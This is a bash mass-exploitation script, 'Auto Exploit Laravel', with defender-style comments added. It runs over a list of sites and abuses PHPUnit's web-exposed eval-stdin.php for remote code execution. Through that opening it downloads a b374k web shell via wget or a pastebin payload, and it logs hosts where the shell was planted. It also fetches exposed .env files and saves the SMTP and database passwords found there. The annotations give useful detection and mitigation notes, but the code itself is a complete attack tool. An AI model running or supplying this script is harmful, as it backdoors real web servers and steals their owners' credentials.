#!/bin/bash
# rce: probe one site for a web-reachable PHPUnit eval-stdin.php and, when the
# endpoint executes the request body, try to place a second-stage PHP file
# next to it.
# Arguments: $1 - base URL of the site
# Outputs:   status lines on stdout; appends to phpunitvuln.txt and
#            shell_phpunit.txt in the current directory
# Globals:   cek and cekshell are assigned without `local`, so they leak into
#            the caller's scope.
#
# Defender notes (what this traffic looks like and how to shut it out):
#   - Every probe hits the fixed path
#     /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php with a request body
#     that starts with "<?php"; a GET carrying a body to that path is a
#     strong access-log / WAF signal.
#   - A follow-up request goes to unit.php in the same directory with the
#     query string "ngacengan_su".
#   - The second payload makes the web server run wget against
#     raw.githubusercontent.com, so egress filtering and process monitoring
#     on the PHP worker both catch it.
#   - Mitigation: serve only the application's public directory, deny web
#     access to vendor/, install production dependencies without dev packages
#     (e.g. `composer install --no-dev`), keep PHPUnit patched, and alert on
#     new .php files appearing under vendor/.
function rce {
local url=$1
# PHP snippet that only prints php_uname("a"); used as the execution test.
local cekos='<?php echo php_uname("a"); ?>'
# PHP snippet that shells out to wget and saves the download as unit.php.
local upshell='<?php system("wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O unit.php"); ?>'
# Trim surrounding whitespace; $url is unquoted here, so it is also subject
# to word splitting and globbing before xargs sees it.
url=$(echo $url | xargs)
# Send the fingerprint snippet as the request body (50 s overall time limit).
cek=$(curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$cekos" --max-time 50)
# The host is treated as affected only if the response contains "Linux".
if [[ $cek == *"Linux"* ]]; then
echo "[os] $cek"
# Record the uname output and the endpoint URL.
echo "$cek" >> phpunitvuln.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" >> phpunitvuln.txt
# Second request delivers the download snippet; output is discarded and no
# --max-time is set on this call or the next one.
curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$upshell" >/dev/null
# Fetch the expected drop location and look for the marker string below.
# NOTE(review): assumes wget wrote into eval-stdin.php's own directory - confirm.
cekshell=$(curl -s "${url}/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su")
if [[ $cekshell == *"IDBTE4M"* ]]; then
echo "[Shell Uploaded] ${url}/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su"
echo "$cek" >> shell_phpunit.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su" >> shell_phpunit.txt
else
# On failure the raw response body of the check request is printed.
echo "[Shell not Uploaded] : $cekshell"
fi
else
echo "[Not Vuln] : $url"
fi
}
# rce2: same probe as rce against PHPUnit's eval-stdin.php, but the second
# stage is written by PHP itself (fopen/fwrite of a file_get_contents()
# download) instead of by wget, and the dropped file is named raimu.php.
# Arguments: $1 - base URL of the site
# Outputs:   status lines on stdout; appends to phpunitvuln.txt and
#            shell_phpunit2.txt in the current directory
# Globals:   cek and cekshell are assigned without `local`.
#
# Defender notes:
#   - Same request signature as rce: a body starting with "<?php" sent to
#     /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, then a request for
#     raimu.php?ngacengan_su in that directory.
#   - The download is made by the PHP process to pastebin.com. Fetching a URL
#     with file_get_contents() needs allow_url_fopen, so disabling it where
#     the application does not need it, plus egress filtering, blocks this
#     variant even on a host where the endpoint is reachable.
#   - The fix is the same as for rce: vendor/ must not be web-reachable and
#     dev dependencies must not be deployed to production.
function rce2 {
local url=$1
# PHP snippet that only prints php_uname("a"); used as the execution test.
local cekos='<?php echo php_uname("a"); ?>'
# PHP snippet that writes the body of a remote paste into raimu.php.
local upshell='<?php fwrite(fopen("raimu.php","w+"),file_get_contents("https://pastebin.com/raw/DWAYZwk5")); ?>'
# Trim surrounding whitespace; $url is unquoted, so it is also word-split.
url=$(echo $url | xargs)
cek=$(curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$cekos" --max-time 50)
# The host is treated as affected only if the response contains "Linux".
if [[ $cek == *"Linux"* ]]; then
echo "[os] $cek"
# Appends to the same phpunitvuln.txt as rce, so a host that answers both
# probes is logged twice.
echo "$cek" >> phpunitvuln.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" >> phpunitvuln.txt
# Deliver the write snippet; output is discarded and no time limit is set.
curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$upshell" >/dev/null
# Fetch the expected drop location and look for the marker string below.
cekshell=$(curl -s "${url}/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su")
if [[ $cekshell == *"IDBTE4M"* ]]; then
echo "[Shell Uploaded] ${url}/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su"
echo "$cek" >> shell_phpunit2.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su" >> shell_phpunit2.txt
else
# Unlike rce, the failure message prints the URL, not the response body.
echo "[Shell not Uploaded] : $url"
fi
else
echo "[Not Vuln] : $url"
fi
}
# getsmtp: request <url>/.env and, if the response looks like an application
# environment file, pull mail or database credentials out of it.
# Arguments: $1 - base URL of the site
# Outputs:   status lines and extracted values on stdout; appends to SMTP.txt
#            and VPS.txt in the current directory
# Globals:   rsmTP, SMTP, PORT, USERNAME, PASSWORD, MENCRYPTION, ROOTU and
#            ROOTP are assigned without `local`.
#
# Defender notes:
#   - The only request is a GET for /.env at the site root. Any 200 response
#     to that path in access logs means the file is exposed: block dotfiles
#     at the web server and serve only the application's public directory.
#   - If a .env file was ever reachable, treat every secret in it as
#     disclosed and rotate it (mail and database credentials are the ones
#     read here).
#   - The User-Agent string carries distinctive misspellings ("Mozlila",
#     "Bulid", "Moblie"), usable as a log-search indicator.
#   - The extracted passwords are printed and written to plaintext files.
function getsmtp {
local url=$1
local eNv="${url}/.env"
# The "\n" sequences are inside double quotes, so bash keeps them as a literal
# backslash and "n". The whole string is passed to curl as one -H value
# rather than as separate header lines.
local headers="Connection: keep-alive\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,fr;q=0.8"
rsmTP=$(curl -s -X GET "$eNv" -H "$headers" --max-time 50)
# A response that mentions mailtrap.io is reported as "not found".
if [[ $rsmTP == *"mailtrap.io"* ]]; then
echo -e "\033[1;31;40m"
# No -e on this echo, so the trailing "\n" is printed literally.
echo "[ - ] NOT FOUND SMTP [ - ] \n"
# "APP_NAME" in the body is taken as proof that a .env file was returned.
elif [[ $rsmTP == *"APP_NAME"* ]]; then
echo -e "\033[1;32;40m"
echo -e "[ + ] FOUND SMTP [ + ]\n"
if [[ $rsmTP == *"MAIL_HOST"* ]]; then
# grep -oP with \K prints only the text after each KEY= up to end of line.
SMTP=$(echo "$rsmTP" | grep -oP 'MAIL_HOST=\K.*')
PORT=$(echo "$rsmTP" | grep -oP 'MAIL_PORT=\K.*')
USERNAME=$(echo "$rsmTP" | grep -oP 'MAIL_USERNAME=\K.*')
PASSWORD=$(echo "$rsmTP" | grep -oP 'MAIL_PASSWORD=\K.*')
MENCRYPTION=$(echo "$rsmTP" | grep -oP 'MAIL_ENCRYPTION=\K.*')
echo -e "= = = = = = = = = = = = = = = = = = = = = = = ="
echo -e "SMTP HOST => $SMTP"
echo -e "SMTP PORT => $PORT"
echo -e "SMTP USERNAME => $USERNAME"
echo -e "SMTP PASSWORD => $PASSWORD"
echo -e "SMTP ENCRYPTION => $MENCRYPTION"
echo -e "= = = = = = = = = = = = = = = = = = = = = = = ="
# Only host, user and password are saved; port and encryption are not.
echo -e "SMTP HOST : $SMTP\nSMTP USER : $USERNAME\nSMTP PASSWORD : $PASSWORD" >> SMTP.txt
fi
# Reached only when the body has neither "mailtrap.io" nor "APP_NAME".
elif [[ $rsmTP == *"DB_USERNAME=root"* ]]; then
ROOTU=$(echo "$rsmTP" | grep -oP 'DB_USERNAME=\K.*')
ROOTP=$(echo "$rsmTP" | grep -oP 'DB_PASSWORD=\K.*')
echo "[ + ] Maybe you can get VPS / DATABASE [+]"
# No -e here either: the record lands in VPS.txt as one line with literal "\n".
echo "HOSTS : $url\nUSERNAME : $ROOTU\nPASSWORD : $ROOTP" >> VPS.txt
else
echo "[ - ] CAN'T FOUND BUG [ - ]"
fi
}
# robot: run each check defined in this file against one site, in a fixed
# order (rce, then rce2, then getsmtp).
# Arguments: $1 - base URL of the site
# Returns:   the exit status of the last check that ran
function robot {
  local url=$1
  local step
  for step in rce rce2 getsmtp; do
    "$step" "$url"
  done
}
# main: entry point. With no arguments it prints the banner and a usage line.
# Otherwise $1 is read as a file of base URLs, one per line, and robot runs
# on each line in turn. A final line with no trailing newline is not
# processed, because `read` returns non-zero for it.
function main {
  if (( $# >= 1 )); then
    while IFS= read -r line; do
      robot "$line"
    done < "$1"
  else
    echo "Auto Exploit Laravel by Clumsy"
    echo "Usage : $0 list.txt"
  fi
}

main "$@"